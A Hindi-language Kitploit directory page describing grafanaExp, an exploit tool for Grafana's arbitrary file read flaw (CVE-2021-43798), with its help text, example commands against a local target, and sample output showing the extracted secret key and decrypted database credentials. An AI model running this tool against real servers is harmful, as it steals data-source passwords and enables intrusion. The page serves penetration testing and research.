Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
grafanaExp — Grafana अनधिकृत मनमानी फ़ाइल पढ़ने की कमजोरी (CVE-2021-43798) के लिए एक शोषण उपकरण, यह प्लगइन्स को बर्स्ट कर सकता है / secret_key निकाल सकता है / data_source जानकारी स्वचालित रूप से डिक्रिप्ट कर सकता है। | Kitploit
उपकरण/GitHubGitHub/a-d-team/grafanaexp
एन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHuba-d-team/grafanaexp

grafanaExp

Grafana अनधिकृत मनमानी फ़ाइल पढ़ने की कमजोरी (CVE-2021-43798) के लिए एक शोषण उपकरण, यह प्लगइन्स को बर्स्ट कर सकता है / secret_key निकाल सकता है / data_source जानकारी स्वचालित रूप से डिक्रिप्ट कर सकता है।

रिपॉजिटरी देखें
27032310 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

grafanaExp

grafana CVE-2021-43798 मनमानी फ़ाइल पढ़ने की भेद्यता का उपयोग करके, स्वचालित रूप से पता लगाता है कि भेद्यता मौजूद है या नहीं, मौजूदा प्लगइन, कुंजी निकालता है, सर्वर-साइड db फ़ाइल को डिक्रिप्ट करता है, और data_sourrce जानकारी आउटपुट करता है।

उपयोग विधि

exp और decode कार्यक्षमता प्रदान करता है।

root@kitploit:~
➜  ./grafanaExp -h
NAME:
   grafanaExp - Exploit Grafana with CVE-2021-43798 Arbitrary File Read.

USAGE:
   grafanaExp [global options] command [command options] [arguments...]

AUTHOR:
   A&D-Team

COMMANDS:
   exp      -u [url] -p [plugin] -c [config] -d [db] -k [key]
   decode   decode -f [dbfile] -k [key]
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h  show help (default: false)

Exp

स्वचालित रूप से पता लगाता है कि भेद्यता मौजूद है या नहीं, मौजूदा प्लगइन, कुंजी निकालता है, सर्वर-साइड db फ़ाइल को डिक्रिप्ट करता है, और data_souce जानकारी आउटपुट करता है:

root@kitploit:~
➜  ./grafanaExp exp -u http://localhost:3000/ 
2021/12/07 22:19:10 Target vulnerable has plugin [alertlist]
2021/12/07 22:19:10 Get secret_key [SW2YcwTIb9zpOOhoPsMm]
2021/12/07 22:19:10 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]
2021/12/07 22:19:10 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 All Done, have nice day!

Decode

जब DB फ़ाइल बहुत बड़ी हो, तो पहले इसे स्थानीय रूप से डाउनलोड करें, फिर स्थानीय रूप से डिक्रिप्ट करें:

root@kitploit:~
➜ ./grafanaExp decode -f grafana.db -k SW2YcwTIb9zpOOhoPsMm
2021/12/07 23:00:20 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]
2021/12/07 23:00:20 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]
2021/12/07 23:00:20 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]
2021/12/07 23:00:20 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]

अद्यतन

root@kitploit:~
1、https का समर्थन (कल नहीं जोड़ा क्योंकि ट्रांसपोर्ट में कुछ अजीब समस्याएं थीं
2、darwin के लिए निष्पादन योग्य फ़ाइल जोड़ी गई
3、nginx को बायपास करने के लिए paylaod जोड़ा (net/http को नग्न रूप से संशोधित किया)

घोषणा

इस प्रोग्राम का उपयोग केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए किया जाना चाहिए।

टूल डाउनलोड करें